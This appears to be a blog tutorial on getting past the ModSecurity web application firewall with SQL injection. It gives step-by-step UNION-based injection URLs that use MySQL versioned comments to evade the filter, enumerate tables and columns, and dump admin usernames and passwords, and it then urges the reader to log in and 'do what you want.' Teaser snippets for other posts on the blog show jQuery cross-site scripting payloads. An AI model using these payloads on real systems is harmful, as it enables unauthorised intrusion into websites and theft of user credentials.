Bypass Mod_Security


This topic is similar as Manual Sql Injection. But mod_security are protect to hack website.
You can see in this screenshot.


Now In this tutorial we can learn how to bypass mod_security

First we need one Target Website
In My case I am using this website:
http://www.target.com.pk

Finding The Amount Of Columns

Now that you found a vulnerable site, you need to find the amount of columns.
You can do this by using the "Order By" function.
Your link should now look like this:

Code:
http://www.target.com.pk/pages.php?ID=18 order by 1--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 2--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 3--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 4--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 5--+ (no error)
http://www.target.com.pk/pages.php?ID=18 order by 6--+ (error)

Finding Vulnerable Columns

So now that you got the amount of columns, you're going to want to see which ones you can get data from.
You do this by using the "Union+Select" or "Union+All+Select" Function. First, you add a - in front of your ID Number.
It should look like this:
Code:
http://www.target.com.pk/pages.php?ID=18 union select 1,2,3,4,5--+
but you can see error


Now see how to bypass this security
/*!5000  */ are use to bypass Mod_security

It should look like this:
http://www.target.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,5--+

Getting Table Names

we want to get our tables from the database.

It should look like this:
http://www.target.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000gROup_cONcat(table_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.tables+ /*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+


Getting Table Names

we want to get our tables from the database.

It should look like this:
Code:
 http://www.target.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000gROup_cONcat(table_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.tables+/*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+

Getting Columns Out Of Tables

It should look like this:
Code:
http://www.target.com.pk/pages.php?ID=18+/*!50000union*/+/*!50000select*/+1,2,3,4,/*!50000gROup_cONcat(column_name,0x0a)*/+from+/*!50000inforMAtion_schema*/.columns+/*!50000wHEre*/+/*!50000taBLe_name*/=CHAR(97, 100, 109, 105, 110)--+




Getting Data From Columns

Ok, so I see username, and password, and that's what I want.
Now, we just replace a few things.
Code:

http://www.target.com.pk/pages.php?ID=-18 /*!50000union*/ /*!50000select*/1,2,3,4,/*!50000gROup_cONcat(Username,0x0a,Password)*/ from+/*!50000admin*/--+





We got user and password
User= admin
Password =admin

Now just find admin page and login  and do what you want to do.

Cheers!!!












Comments

Post a Comment

Popular posts from this blog

Location.Hash exploit || JQuery 1.11.3/1.7.2/1.6.1 Cross Site Scripting

Image
This is the code for exploiting (location.hash) JQuery for Cross Site Scripting: <html>     <head>          <title>Jquery XSS Test 1</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <script>                     $(location.hash.split('#')[1]);                 </script>    </head>      <body>         Jquery DOM XSS     </body> </html> OR, <html>     <head>          <title>Jquery XSS Test 2</title>                 <script type="text/javascript"                                             src=" https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js ">                 </script>                 <
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
Read more